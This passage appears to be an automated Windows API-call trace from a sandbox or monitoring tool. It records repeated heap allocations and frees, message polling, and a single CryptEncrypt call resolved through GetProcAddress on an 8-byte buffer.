HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0251.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0251.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0251.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0251.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0251.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0251.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0251.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0251.461] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0251.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0251.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0251.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0251.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0251.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0251.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0251.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0251.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16f8 [0251.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0251.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0251.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0251.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0251.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0251.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0251.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.463] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0251.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0251.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0251.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0251.464] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0251.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa790 [0251.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0251.464] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.464] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0251.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0251.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.465] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0251.465] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0251.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.468] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0251.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0251.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa358, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0251.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.470] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0251.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0251.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0251.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0251.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0251.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0251.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0251.471] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b2ce8*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b2ce8*, pdwDataLen=0x8bef68*=0x8) returned 1 [0251.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0251.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0251.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0251.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0251.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0251.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0251.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0251.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0251.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0251.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0251.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0251.473] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0251.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0251.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0251.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0251.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.473] 